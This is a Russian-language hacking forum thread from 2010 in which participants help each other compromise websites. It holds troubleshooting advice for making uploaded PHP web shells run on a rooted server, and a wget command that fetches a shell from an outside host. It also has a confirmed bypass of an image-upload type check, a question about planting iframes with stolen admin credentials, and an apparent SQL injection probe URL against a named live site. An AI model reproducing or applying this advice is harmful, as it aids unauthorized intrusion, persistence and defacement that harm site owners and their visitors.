ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.03.2010, 18:16
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от Root-access
А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.
Единственный вывод данных - это ругание на ошибку в синтаксе, т.е. когда сам запрос не может выполниться из-за скажем кавычки внутри или вызова несуществующей функции. Все остальные ошибки (на приведение типов например - convert (int, @@version)) никак себя не проявляют...
PS Приведенная мною ошибка в том посте про incorrect identifier - это результат на локальной системе, на самом сайте она не показывается.
|
|
|
20.03.2010, 19:38
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку -
Код:
UID of script "/home/*****/public_html/shell.php" is smaller than min_uid
выставил чмоды и выдает уже такую ошибку -
Код:
File "/home/*****/public_html/shell.php" is writeable by group
как сделать что бы шелл нормально работал?
Последний раз редактировалось .:[melkiy]:.; 20.03.2010 в 20:02..
|
|
|
|
20.03.2010, 19:49
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от .:[melkiy]:.
порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку -
Код:
UID of script "/home/*****/public_html/shell.php" is smaller than min_uid
выставил чмоды и выдает уже такую ошибку -
Код:
File "/home/ufaserv/public_html/wso2.php" is writeable by group
как сделать что бы шелл нормально работал?
шелл должен иметь владельца такого же, как и все файлы в папке (chown ufaserv wso.php) и права 755
|
|
|
|
20.03.2010, 19:58
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от попугай
шелл должен иметь владельца такого же, как и все файлы в папке (chown ufaserv wso.php) и права 755
GID of script "/home/*****/public_html/wso2.php" is smaller than min_gid
UPD: chown username:username * -R , так заработало
Сообщение от daniel_1024
я открыл консоль на сервере..как закачать полноценный шелл ? права рут.
wget http://yoursite.ru/shell.php -O yaneshell.php
xeksite.ru/yaneshell.php
Последний раз редактировалось .:[melkiy]:.; 20.03.2010 в 20:21..
|
|
|
|
20.03.2010, 20:16
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
я открыл консоль на сервере..как закачать полноценный шелл ? права рут.
|
|
|
|
20.03.2010, 21:25
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Скажите, как можно имея ник и пасс админа, изменить исходный код сайта (например ифрейм поставить)? На сайте не возможно залогинится. Как можно реализовать?
|
|
|
|
20.03.2010, 21:41
|
|
Banned
Регистрация: 14.06.2009
Сообщений: 256
Провел на форуме:
260151
Репутация:
105
|
|
Имеется такой код:
$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;
if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так? |
|
|
|
20.03.2010, 21:47
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Life7
Имеется такой код:
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?
Да.
|
|
|
|
20.03.2010, 22:21
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Сообщение от daniel_1024
я открыл консоль на сервере..как закачать полноценный шелл ? права рут.
Не понял )).Ну,как бы команды wget,lynx,source никто не отменял  .И вообще,консолей много всяких...может,ты вообще сидел за терминалом рядом с системником?))))
ЗЫ: Я так понял,у тебя bash/csh или чет такое.
|
|
|
|
20.03.2010, 23:45
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
http://www.simqam.com/products.php?cid=48%2b1=1
Последний раз редактировалось Darren; 21.03.2010 в 00:29..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1998151){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1998207){kind=avatar}
Похожие темы
Линейный вид
